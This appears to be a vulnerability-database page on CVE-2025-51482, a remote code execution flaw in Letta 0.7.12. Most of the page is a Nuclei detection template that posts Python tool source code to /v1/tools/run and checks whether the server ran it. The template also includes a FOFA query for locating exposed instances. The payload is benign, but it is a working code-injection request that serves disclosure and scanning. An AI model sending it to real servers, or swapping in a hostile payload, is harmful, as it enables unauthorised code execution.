漏洞描述
Letta 0.7.12 is vulnerable to remote code execution via POST /v1/tools/run in letta.server.rest_api.routers.v1.tools.run_tool_from_source, allowing attackers to execute arbitrary Python and OS commands via crafted tool source code.
CVE-2025-51482: Letta Letta 0.7.12 - Remote Code Execution
PoC代码[已公开]
id: CVE-2025-51482
info:
name: Letta Letta 0.7.12 - Remote Code Execution
author: RaghavArora14
severity: high
description: |
Letta 0.7.12 is vulnerable to remote code execution via POST /v1/tools/run in letta.server.rest_api.routers.v1.tools.run_tool_from_source, allowing attackers to execute arbitrary Python and OS commands via crafted tool source code.
reference:
- https://www.gecko.security/blog/cve-2025-51482
- https://github.com/letta-ai/letta/pull/2630
- https://github.com/Kai-One001/Letta-CVE-2025-51482-RCE
- https://nvd.nist.gov/vuln/detail/CVE-2025-51482
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2025-51482
epss-score: 0.0902
epss-percentile: 0.92279
cwe-id: CWE-94
cpe: cpe:2.3:a:letta:letta:0.7.12:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: letta
product: letta
fofa-query: title="Letta"
tags: cve,cve2025,rce,letta,vkev
variables:
num: "999999999"
http:
- raw:
- |
POST /v1/tools/run HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{
"name": "nuclei",
"args": {},
"json_schema": {"type": "object", "properties": {}},
"source_code": "def nuclei():\n import hashlib\n data='{{num}}'.encode('utf-8')\n return ''+hashlib.md5(data).hexdigest()"
}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '{{md5(num)}}'
- 'tool_return":'
condition: and
- type: word
part: content_type
words:
- "application/json"
- type: status
status:
- 200
# digest: 4b0a00483046022100b8a80fc56c8aabc43e4197af5b3e3b2ac29b6e3811700e1b8682cd2c493d26e3022100f2da69e45374943b5ceaa82946b16d859b5e92ef531200832342c332ac33e3dc:922c64590222798bb761d5b6d8e72950